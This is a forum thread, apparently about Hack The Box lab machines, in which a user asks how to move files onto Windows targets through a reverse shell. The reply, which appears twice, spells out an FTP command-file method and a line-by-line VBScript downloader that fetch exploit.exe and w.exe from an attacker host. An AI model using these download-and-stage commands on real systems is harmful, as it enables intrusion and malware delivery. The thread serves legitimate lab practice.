I am trying to move machines from my device to Windows target machines (Arctic, Optimum) but I don’t get any response from the reverse shell. I don’t want to use Metasploit/Meterpreter and I get a simple shell. I tried to use powershell to get file from my http server as well as ftp and smb but after powershell.exe or ftp.exe the shell becomes unresponsive. When I echo ps1 content to a file and run it with powershell.exe, the same happens. On my http server I don’t see any file requested.
Is there any other way to transfer files to these machines from Windows shell?
thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good or PoSh-less machines like WS2003: echo dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) > p.vbs
echo dim bStrm: Set bStrm = createobject(“Adodb.Stream”) >> p.vbs
echo xHttp.Open “GET”, “http://10.10.14.31/w.exe”, False >> p.vbs
cho xHttp.Send >> p.vbs
echo[ >> p.vbs
echo with bStrm >> p.vbs
echo .type = 1 >> p.vbs
echo .open >> p.vbs
echo .write xHttp.responseBody >> p.vbs
echo .savetofile “c:\windows\temp\pawel\w.exe”, 2 >> p.vbs
echo end with >> p.vbs
thanks guys for your hints! I figured out that it is best to create a command file (e.g. for FTP: echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME) and execute ftp with it. Also vbs is good or PoSh-less machines like WS2003: echo dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”) > p.vbs
echo dim bStrm: Set bStrm = createobject(“Adodb.Stream”) >> p.vbs
echo xHttp.Open “GET”, “http://10.10.14.31/w.exe”, False >> p.vbs
cho xHttp.Send >> p.vbs
echo[ >> p.vbs
echo with bStrm >> p.vbs
echo .type = 1 >> p.vbs
echo .open >> p.vbs
echo .write xHttp.responseBody >> p.vbs
echo .savetofile “c:\windows\temp\pawel\w.exe”, 2 >> p.vbs
echo end with >> p.vbs
This is very time consuming and not convenient at all. Use it when every other option isn’t usable!